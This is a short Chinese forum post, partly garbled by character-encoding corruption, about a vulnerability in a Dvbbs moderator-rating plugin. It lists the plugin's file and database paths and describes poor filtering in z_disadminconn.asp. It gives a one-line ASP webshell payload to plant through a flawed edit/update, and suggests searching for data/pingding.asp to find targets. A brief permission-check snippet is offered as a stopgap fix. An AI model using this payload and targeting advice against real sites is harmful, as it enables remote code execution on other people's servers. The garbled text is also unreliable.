就是關(guān)于“斑主評定”欄目,當(dāng)然是插件。
插件比較亂,有很多,比如前臺就是
z_disadmin.asp
z_disadmin_edit.asp
z_disadminconn.asp
后臺在data/#pingding.mdb
有的后臺在data/pingding.asp
有的則在data/disadmin_db.asp
另外有的后臺會這樣Data_plus/something的!
當(dāng)然可以暴庫,關(guān)鍵就是z_disadminconn.asp過濾不嚴,但是必須要找到它的所在,而且要二級。
利用的方法:
--------------------------------
關(guān)于mdb作數(shù)據(jù)庫的,那當(dāng)然沒什么危險,這個漏洞也只能算是個雞肋。
但是對于asp作數(shù)據(jù)庫的,卻有利用的方法。
這都是因為edit中一個update的錯誤,大部分字段都是整型的,因為數(shù)據(jù)庫的規(guī)定
而有一個字段是可以寫入木馬的。
雖然長度有限制,但是夠?qū)懸粋€微型木馬了,我用<%execute request("allyesno")%>
對于暫時的防范,可以在edit中加入一個過濾參數(shù):
-----------codz begin----------------
Head()
dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRs
admin_flag="22"
if not Dvbbs.master or instr(session("flag"),admin_flag)=0 then
Errmsg=ErrMsg + "<BR><li>本頁面為管理員專用,請<a href=admin_index.asp target=_top>
登陸</a>后進入。<br><li>您沒有管理本頁面的權(quán)限。"
dvbbs_error()
end if
-------------codz end---------------
總而言之,只能說明開發(fā)插件的人頭腦有問題。
雖然利用不大,擴散不廣。但是還是有得玩的!
具體攻擊:
應(yīng)該是搜索data/pingding.asp。一般這個數(shù)據(jù)庫沒人改的。


